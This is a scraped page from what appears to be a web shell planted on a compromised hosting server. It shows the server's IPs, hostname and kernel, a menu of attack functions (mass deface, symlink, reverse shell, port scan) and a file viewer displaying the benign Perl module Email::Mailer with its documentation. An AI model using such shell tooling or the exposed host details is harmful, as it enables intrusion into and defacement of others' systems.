ヤミRoot VoidGate
User / IP
:
216.73.216.110
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
itrave
/
perl5
/
lib
/
perl5
/
Email
/
Viewing: Mailer.pm
package Email::Mailer; # ABSTRACT: Multi-purpose emailer for HTML, auto-text, attachments, and templates use 5.014; use strict; use warnings; use HTML::FormatText; use HTML::TreeBuilder; use IO::All 'io'; use Email::MIME 1.940; use Email::MIME::CreateHTML; use Email::Sender::Simple 'sendmail'; our $VERSION = '1.09'; # VERSION sub new { my $self = shift; unless ( ref $self ) { # $self is not an object, is incoming pair values = make $self object $self = bless( {@_}, $self ); } else { # $self is an object = make a new $self object incorporating any new values $self = bless( { %$self, @_ }, ref $self ); } # for a certain set of keys, ensure they are all lower-case $self->{ lc $_ } = delete $self->{$_} for ( grep { /^(?:to|from|subject|html|text)$/i and /[A-Z]/ } keys %$self ); return $self; } sub send { my $self = shift; # if @_ is a set of hashrefs, map them into new mail objects; otherwise, just merge in new values; # then iterate through the objects inside the map my @mails = map { # make a clean copy of the data so we can return the mail object unchanged at the end my $mail = {%$_}; # process any template functionality (look for values that are scalarrefs) if ( ref $mail->{process} eq 'CODE' ) { $mail->{$_} = $mail->{process}->( ${ $mail->{$_} }, $mail->{data} || {} ) for ( grep { ref $mail->{$_} eq 'SCALAR' } keys %$mail ); } # automatically create the text version from HTML if there is no text version and there is HTML if ( $mail->{html} and not $mail->{text} ) { my $width = $mail->{width} // 72; $width ||= 1_000_000; $mail->{text} = HTML::FormatText ->new( leftmargin => 0, rightmargin => $width ) ->format( HTML::TreeBuilder->new->parse( $mail->{html} ) ); } # create a headers hashref (delete things from a data copy that known to not be headers) my $headers = [ map { $mail->{$_} = join( ',', @{ $mail->{$_} } ) if ( ref $mail->{$_} eq 'ARRAY' ); $mail->{$_} = join( ',', values %{ $mail->{$_} } ) if ( ref $mail->{$_} eq 'HASH' ); ucfirst($_) => $mail->{$_}; } grep { not /^(?:html|text|embed|attachments|process|data|transport|width)$/i } sort keys %$mail ]; # build up an attachments arrayref of attachment MIME objects my $attachments = ( not $mail->{attachments} or ref $mail->{attachments} ne 'ARRAY' ) ? [] : [ map { Email::MIME->create( attributes => { disposition => 'attachment', content_type => $_->{ctype} || 'application/octet-stream', encoding => $_->{encoding} // 'base64', filename => $_->{name} || $_->{filename} || $_->{source}, name => $_->{name} || $_->{filename} || $_->{source}, }, body => ( ( $_->{content} ) ? $_->{content} : io( $_->{source} )->binary->all ), ), } @{ $mail->{attachments} } ]; # build a single MIME email object to send based on what data we have for the email my $email_mime; if ( $mail->{text} and not $mail->{html} and @$attachments == 0 ) { $email_mime = Email::MIME->create( header => $headers, body => $mail->{text}, ); } elsif ( $mail->{text} and not $mail->{html} ) { $email_mime = Email::MIME->create( header => $headers, attributes => { content_type => 'multipart/mixed' }, parts => [ Email::MIME->create( header => [], body => $mail->{text}, ), @$attachments, ], ); } else { $email_mime = Email::MIME->create( header => $headers, attributes => { content_type => 'multipart/mixed' }, parts => [ Email::MIME->create_html( header => [], body => $mail->{html}, text_body => $mail->{text}, embed => $mail->{embed}, ), @$attachments, ], ); } # send the email with Email::Sender::Simple sendmail( $email_mime, { transport => $mail->{transport} } ); $_; } ( ref $_[0] eq 'HASH' ) ? ( map { $self->new(%$_) } @_ ) : $self->new(@_); # return the mail objects as desired by the caller return ( wantarray() ) ? (@mails) : \@mails; } 1; __END__ =pod =encoding UTF-8 =head1 NAME Email::Mailer - Multi-purpose emailer for HTML, auto-text, attachments, and templates =head1 VERSION version 1.09 =for markdown [](https://travis-ci.org/gryphonshafer/Email-Mailer) [](https://coveralls.io/r/gryphonshafer/Email-Mailer) =head1 SYNOPSIS use Email::Mailer; my ( $to, $from, $subject, $text, $html ); # send a simple text email Email::Mailer->send( to => $to, from => $from, subject => $subject, text => $text, ); # send multi-part HTML/text email with the text auto-generated from the HTML # and images and other resources embedded in the email my $mail = Email::Mailer->new; $mail->send( to => $to, from => $from, subject => $subject, html => $html, ); # send multi-part HTML/text email with the text auto-generated from the HTML # but skip embedding images and other resources Email::Mailer->new->send( to => $to, from => $from, subject => $subject, html => $html, embed => 0, ); # send multi-part HTML/text email but supply the text explicitly Email::Mailer->new( to => $to, from => $from, subject => $subject, html => $html, text => $text, )->send; # send multi-part HTML/text email with a couple of attached files use IO::All 'io'; Email::Mailer->send( to => $to, from => $from, subject => $subject, html => $html, text => $text, attachments => [ { ctype => 'application/pdf', source => 'file.pdf', }, { ctype => 'application/pdf', content => io('file.pdf')->binary->all, encoding => 'base64', name => 'file.pdf', }, ], ); # build an email and iterate over a data set for sending Email::Mailer->new( from => $from, subject => $subject, html => $html, )->send( { to => 'person_0@example.com' }, { to => 'person_1@example.com' }, { to => 'person_2@example.com', subject => 'Override $subject with this', }, ); # setup a second mail object based on the first but changing the "from" my $mail_0 = Email::Mailer->new( from => $from, subject => $subject, html => $html, ); my $mail_1->new( from => 'different_address@example.com' ); $mail_0->send; $mail_1->send; # use a templating system for the HTML and subject use Template; my $tt = Template->new; my $tmail = Email::Mailer->new( from => $from, subject => \$subject, html => \$html, process => sub { my ( $template, $data ) = @_; my $content; $tt->process( \$template, $data, \$content ); return $content; }, ); $tmail->send($_) for ( { to => 'person_0@example.com', data => { name => 'Person 0' } }, { to => 'person_1@example.com', data => { name => 'Person 1' } }, ); =head1 DESCRIPTION Following the charter and example of L<Email::Simple>, this module provides a simple and flexible interface to sending various types of email including plain text, HTML/text multi-part, attachment support, and template hooks. The module depends on a series of great modules in the Email::* and HTML::* namespaces. =head1 PRIMARY METHODS There are 2 primary methods. =head2 new This is an instantiator and a replicative instantiator. If passed nothing, it'll return you a blank mail object. If you pass it anything, it'll use that data to setup a more informed mail object for later sending. my $mail_blank = Email::Mailer->new; my $mail_to = Email::Mailer->new( to => 'default_to@example.com'); If you call C<new()> off an instantiated mail object, it'll make a copy of that object, changing any internal data based on what you pass in to the C<new()>. # create a new object with both a default "To" and "From" my $mail_to_from = $mail_to->new( from => 'default_from@example.com' ); =head2 send This method will attempt to send mail. Any parameters you can pass to C<new()> you can pass to C<send()>. Any incoming parameters will override any existing parameters in an instantiated object. $mail_to_from->send( subject => 'Example Subject Line', text => 'Hello. This is example email content.', ); If C<send()> succeeds, it'll return an instantiated object based on the combined parameters. If it fails, it'll throw an exception. use Try::Tiny; my $mail_with_all_the_parameters; try { $mail_with_all_the_parameters = $mail_to_from->send( subject => 'Example Subject Line', text => 'Hello. This is example email content.', ); } catch { print "There was an error, but I'm going to ignore it and keep going.\n"; }; You can also pass to C<send()> a list of hashrefs. If you do that, C<send()> will assume you want each of the hashrefs to be like a set of data sent to an independent call to C<send()>. The method will attempt to send multiple emails based on your data, and it'll return an array or arrayref (based on context) of the mail objects ultimately created. my @emails_sent = $mail_with_all_the_parameters->send( { to => 'person_0@example.com' }, { to => 'person_1@example.com' }, ); my $emails_sent = $mail_with_all_the_parameters->send( { to => 'person_0@example.com' }, { to => 'person_1@example.com' }, ); $mail_with_all_the_parameters->send($_) for ( { to => 'person_0@example.com' }, { to => 'person_1@example.com' }, ); =head1 PARAMETERS There are a bunch of parameters you can pass to the primary methods. First off, anything not explicitly mentioned in this section, the methods will assume is a mail header. If any value of a key is a reference to scalar text, the value of that scalar text will be assumed to be a template and processed through the subref defined by the "process" parameter. =head2 html This parameter should contain HTML content (or a reference to scalar text that is the template that'll be used to generate HTML content). =head2 text This parameter should contain plain text content (or a template reference). If not provided then "text" will be automatically generated based on the "html" content. By default, the text generated will be wrapped at 72 characters width. However, you can override that by setting width explicitly: Email::Mailer->new->send( to => $to, from => $from, subject => $subject, html => $html, width => 120, ); If you set a width to 0, this will be interpreted as meaning not to wrap text lines. =head2 embed By default, if your HTML has links to things like images or CSS, those resources will be pulled in and embedded into the email message. If you don't want that behavior, turn it off by explicitly setting "embed" to a false value. Email::Mailer->new->send( to => $to, from => $from, subject => $subject, html => $html, embed => 0, ); =head2 attachments This parameter if needed should be an arrayref of hashrefs that define the attachments to add to an email. Each hashref should define a "ctype" for the content type of the attachment and either a "source" or both a "name" and "content" key. The "source" value should be a local relative path/file. The "content" value should be binary data, and the "name" value should be the filename of the attachment. use IO::All 'io'; Email::Mailer->send( to => $to, from => $from, subject => $subject, html => $html, text => $text, attachments => [ { ctype => 'application/pdf', source => 'file.pdf', }, { ctype => 'application/pdf', content => io('file.pdf')->binary->all, encoding => 'base64', name => 'file.pdf', }, ], ); An optional parameter of "encoding" can be supplied in a hashref to "attachments" to indicate what encoding the attachment should be encoded as. If not specified, the default is "base64" encoding, which works in most cases. Another popular choice is "quoted-printable". =head2 process This parameter expects a subref that will be called to process any templates. You can hook in any template system you'd like. The subref will be passed the template text and a hashref of the data for the message. use Template; my $tt = Template->new; my $tmail = Email::Mailer->new( from => $from, subject => \$subject, html => \$html, process => sub { my ( $template, $data ) = @_; my $content; $tt->process( \$template, $data, \$content ); return $content; }, ); =head2 data This parameter is the hashref of data that'll get passed to the "process" subref. $tmail->send($_) for ( { to => 'person_0@example.com', data => { name => 'Person 0' } }, { to => 'person_1@example.com', data => { name => 'Person 1' } }, ); =head2 transport By default, this module will try to pick an appropriate transport. (Well, technically, L<Email::Sender::Simple> does that for us.) If you want to override that and set your own transport, use the "transport" parameter. use Email::Sender::Transport::SMTP; Email::Mailer->send( to => $to, from => $from, subject => $subject, html => $html, transport => Email::Sender::Transport::SMTP->new({ host => 'smtp.example.com', port => 25, }), ); =head1 SEE ALSO L<Email::MIME>, L<Email::MIME::CreateHTML>, L<Email::Sender::Simple>, L<Email::Sender::Transport>, L<HTML::FormatText>, L<HTML::TreeBuilder>. You can also look for additional information at: =over 4 =item * L<GitHub|https://github.com/gryphonshafer/Email-Mailer> =item * L<CPAN|http://search.cpan.org/dist/Email-Mailer> =item * L<MetaCPAN|https://metacpan.org/pod/Email::Mailer> =item * L<AnnoCPAN|http://annocpan.org/dist/Email-Mailer> =item * L<Travis CI|https://travis-ci.org/gryphonshafer/Email-Mailer> =item * L<Coveralls|https://coveralls.io/r/gryphonshafer/Email-Mailer> =item * L<CPANTS|http://cpants.cpanauthors.org/dist/Email-Mailer> =item * L<CPAN Testers|http://www.cpantesters.org/distro/D/Email-Mailer.html> =back =head1 AUTHOR Gryphon Shafer <gryphon@cpan.org> =head1 COPYRIGHT AND LICENSE This software is copyright (c) 2018 by Gryphon Shafer. This is free software; you can redistribute it and/or modify it under the same terms as the Perl 5 programming language system itself. =cut
Coded With 💗 by
0x6ick